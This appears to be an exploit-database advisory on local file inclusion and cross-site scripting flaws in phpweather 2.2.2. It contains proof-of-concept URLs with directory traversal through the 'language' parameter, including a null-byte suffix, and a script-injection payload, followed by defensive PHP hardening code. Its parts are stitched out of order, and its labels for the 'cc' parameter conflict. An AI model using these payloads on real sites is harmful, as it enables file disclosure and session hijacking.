Vendor: phpweather
By: ahmadbady
CVSS: 8.8 (HIGH)
Type: Local File Inclusion/Cross-Site Scripting
CWE: 22, 79
Product Name: phpweather
Affected Version From: 2.2.2002
Affected Version To: 2.2.2002
Patch Exists: NO
Related CWE: N/A
CPE: a:phpweather:phpweather:2.2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Lfi/xss

A vulnerability exists in phpweather-2.2.2 which can be exploited by malicious people to conduct Local File Inclusion and Cross-Site Scripting attacks. The vulnerability is caused by the application including user-supplied input without proper sanitization. This can be exploited to include arbitrary local files by passing directory traversal strings to the 'language' parameter of the 'test.php' script, and to execute arbitrary HTML and script code in a user's browser session in the context of an affected site by passing malicious code to the 'cc' parameter of the 'index.php' script.

Mitigation:

Input validation should be used to ensure that untrusted input is rejected: the 'language' value should be checked against an allow-list of known language files before it is used in an include path, and all user input should be encoded before it is echoed into HTML, so that malicious code cannot be executed.
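As an added example (not phpweather's own code) of the mitigation above: the quoted require() pattern next to an allow-listed replacement, plus output encoding for a reflected parameter. It assumes PHPWEATHER_BASE_DIR is the application's base-directory constant and that language files are named pw_text_<code>.php with two-letter codes, as the quoted line suggests; the code-pattern regex and the function names are hypothetical.

```php
<?php
// Added example, not phpweather's code. Assumes PHPWEATHER_BASE_DIR is the
// application's base-directory constant, as in the require() quoted above.
define('PHPWEATHER_BASE_DIR', __DIR__);

// Vulnerable pattern described in the advisory: the request parameter is
// interpolated straight into the include path, so traversal sequences (and,
// on old PHP, a NUL byte) let the request select an arbitrary local file.
function load_language_vulnerable(string $language): void
{
    require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php");
}

// Hardened version: validate the value against an allow-list of language-code
// shapes, then confirm the resolved file really lives in the output directory.
function resolve_language_file(string $language): ?string
{
    // Assumed code format (e.g. "en", "pt_br"); rejects slashes, dots,
    // NUL bytes and anything else outside the expected set.
    if (!preg_match('/^[a-z]{2}(_[a-z]{2})?$/', $language)) {
        return null;
    }
    $dir  = realpath(PHPWEATHER_BASE_DIR . '/output');
    $file = realpath($dir . '/pw_text_' . $language . '.php');
    // realpath() is false for a missing file; also check the path stayed inside $dir.
    if ($dir === false || $file === false
        || strpos($file, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

function load_language_safe(string $language): void
{
    $file = resolve_language_file($language);
    if ($file === null) {
        http_response_code(400);
        exit('unknown language');
    }
    require($file);
}

// Reflected parameters such as 'cc' must be HTML-encoded before being echoed.
function html_encode(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

load_language_safe($_GET['language'] ?? 'en');
echo '<p>Country: ' . html_encode($_GET['cc'] ?? '') . '</p>';
```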

Exploit-DB raw data:

****(Lfi/xss)****

script: phpweather-2.2.2

***************************************************************************
download from:http://downloads.sourceforge.net/phpweather/phpweather-2.2.2.zip?modtime=1087430400&big_mirror=0
   
***************************************************************************
vul:
/test.php

line 48:
 require(PHPWEATHER_BASE_DIR . "/output/pw_text_$language.php");
   
***************************************************
xpl:
www.site.com/path/test.php?metar=()&language=[Lfi]%00
.....................................................
www.site.com/path/index.php?cc=[Lfi]
....................................................
xss:
www.site.com/path/config/make_config.php/>"><ScRiPt>alert(0)</ScRiPt>
..................................................

Author: ahmadbady from:iran

***************************************************

# milw0rm.com [2008-12-14]